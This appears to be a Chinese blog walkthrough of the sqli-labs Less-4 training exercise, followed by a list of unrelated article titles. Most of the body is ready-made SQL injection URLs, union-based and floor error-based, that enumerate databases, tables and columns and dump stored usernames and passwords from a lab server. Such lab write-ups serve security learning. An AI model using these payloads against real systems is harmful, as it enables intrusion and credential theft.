sqli-libs(4) 双引号报错
经测试,发现单引号不报错,而双引号却报错了
通过查看源码,发现下图中红色的箭头,如果不知道是什么意思,我们可以复制出来看看是什么含义:
<?php
$id=1;
$id='"' .$id. '"';
echo $id;
?>
得知是给参数加上两个双引号,,
后面带入查询语句的时候 还加了() ,所有我们的payload如下
一、 union 查询
查询字段:http://192.168.48.130/sqli-labs-master/Less-4/?id=1") order by 3--+
查询当前数据库:http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,database(),3--+
查询所有数据库:http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
查询security数据库下的所有表:http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),3--+
查询users表下的所有字段:
http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+
查询username,password 的具体值:
http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(username,0x3a,password) from users),3--+
二、floor报错注入
查询数据库 Limit 来控制:
http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
爆表 Limit控制:
http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
爆字段:
http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
爆内容:
http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
最新文章
- compositionEnd 和 input 事件(中文输入法问题)
- List remove注意点
- 【Android Demo】简单手机通讯录
- Linux服务器使用命令操作MySQL插入数据乱码问题
- 五分钟看懂js关键字this
- yii2源码学习笔记(二)
- IO通信
- SWT入门-常用组件的使用(转)
- Ecplise 中 加载JDBC 连接 Mysql 数据库读取数据
- 使用Docker
- vs2015数据驱动的单元测试
- CentOS 7 下面使用 sendMail 发送邮件
- Java知识回顾 (8) 集合
- Asp.Net 自定义设置Http缓存示例(一)
- 记录前台页面一些jQuery笔记
- Ubuntu16.04中禁用UTC解决双系统时间问题
- Django 模板语言 路由 视图
- GPG key retrieval failed: [Errno 14] Could not open/read file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-
- 使用 telnet 发邮件
- Effective JavaScript Item 46 优先使用数组而不是Object类型来表示有顺序的集合
热门文章
- 试玩 GOWOG ,初探 OpenAI(使用 NeuroEvolution 神经进化)与 Golang 多人在线游戏开发
- H3C、Huawei、Cisco网络设备AAA TACACS认证配置
- 【Soul源码探秘】插件链实现
- 编译Nacos,解决No Server available 以及 failed to req API__nacos_v1_ns_instance after all servers
- .NET 中依赖注入组件 Autofac 的性能漫聊
- Update Node Using a Package Manager nodesource
- maven打包三种方式
- UML 博客学习 后续继续完善
- 向数据库添加100W 条数据 性能测试
- Jenkins(2)docker容器中安装python3